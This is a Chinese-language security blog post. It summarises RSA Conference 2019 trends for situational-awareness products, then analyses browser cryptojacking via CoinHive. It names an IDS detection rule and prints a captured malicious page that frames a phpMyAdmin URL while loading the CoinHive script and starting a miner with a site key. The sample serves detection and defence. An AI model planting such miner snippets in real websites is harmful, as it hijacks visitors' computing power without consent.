RSA Conference 2019——态势感知产品进化论

bt0sea 系统安全 2019-03-11 11:50:36

217297

导语：RSA Conference 2019正在美国拉开帷幕，今年的主题是better，从0到1的安全产品目前没怎么看到，大部分的微创新创新都来自于已经固化的产品形态。态势感知做为这两年新出来的产品形态，我想也应该吸收一下大会的精髓。

0x00、前言

RSA Conference 2019正在美国拉开帷幕，它代表全球顶尖的安全盛宴，作为安全行业中人也小小的研究了一下。今年的主题是better，从0到1的安全产品目前没怎么看到，大部分的微创新创新都来自于已经固化的产品形态。态势感知做为这两年新出来的产品形态，我想也应该吸收一下大会的精髓。

· 1、云原始安全产品将逐步扩大自己的安全产品线，以满足云上用户对安全的需求，做到传统安全无缝迁移到云安全。

· 2、所有的产品都要支持多公有云、混合云、专有云环境。态势感知更加明显，例如：不能把鸡蛋放一个篮子里的多公有云数据融合，ToG专有政务云、电子政务外网和互联网区的安全数据融合、以及现在炒的很火的城市云大业态安全。

· 3、态势感知除了保护云主机外，今年的趋势要增加云物理机和容器。甚至微服务（API）。容器是一个明显的趋势。这就需要产品对容器安全有深入理解和切实可行的改造方案。

· 4、态势感知产品本身的threat hunting也是要加强的部分，除了纵深防御各个安全组件的全量部署，还需要对主机安全加强轻量级EDR是今天产品研发的重点。还有及时原来传统的SOC中的log feed的过程也要支撑，还好现在有flume可以更好的把事件日志格式归一处理后发送给态势感知。

· 5、最后就是入侵检测算法部分，C2隐藏通讯检测、DNS隐藏隧道检测、告警图分析、有效的kill-chain关联分析部分。这部分需要使用KDE时序统计分析、图分析等技术。

0x01、实际案例分析

网页挖矿在公有云里非常常见的一种入侵行为。下面我就以它的实际案例分析。

tip1:什么是加密挖掘恶意软件（CoinHive Javascript）？

CoinHive是一种在线服务，提供可以使用JavaScript安装在网站上的加密货币采矿者，JavaScript矿工在网站访问者的浏览器中运行并在区块链上挖矿。它被宣传为在网站上放置广告的替代方案。事实证明，它被黑客用作恶意软件，首先通过感染网站来劫持网站的最终客户。

要使用CoinHive挖矿，您所要做的就是在网站的页眉/页脚中放置一个小的JavaScript代码段。当访问者访问该站点时，CoinHive JavaScript将被激活并开始利用其可用的CPU功率。现场有10-20名活跃的矿工，平均月收入约为0.25 XMR（约88美元）。为了增加收入，黑客一直在通过注入加密挖掘恶意软件来利用易受攻击的网站（CoinHive）。

虽然CoinHive本身并不是恶意服务，但它已被黑客广泛用于使用被黑网站挖掘硬币。因此，许多恶意软件扫描程序和安全机构已将该域列入黑名单。

tip2:如何查找挖矿脚本

我们先使用IDS规则：

ET CURRENT_EVENTS CoinHive In-Browser Miner Detected

<html>

<head>
.<meta http-equiv="Content-Type" content="text/html;charset=windows-1251">
.<title>"http://220.119.63.29/phpMyAdmin123/index.php"</title> 
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
.var miner = new CoinHive.Anonymous('48zUYBdsYIIfcmIn3S38ss81A17xGkpA', {throttle: 0.1});
.miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
</script>
</head>

<frameset>
<frame src="http://220.119.63.29/phpMyAdmin123/index.php"></frame>
</frameset>
</html>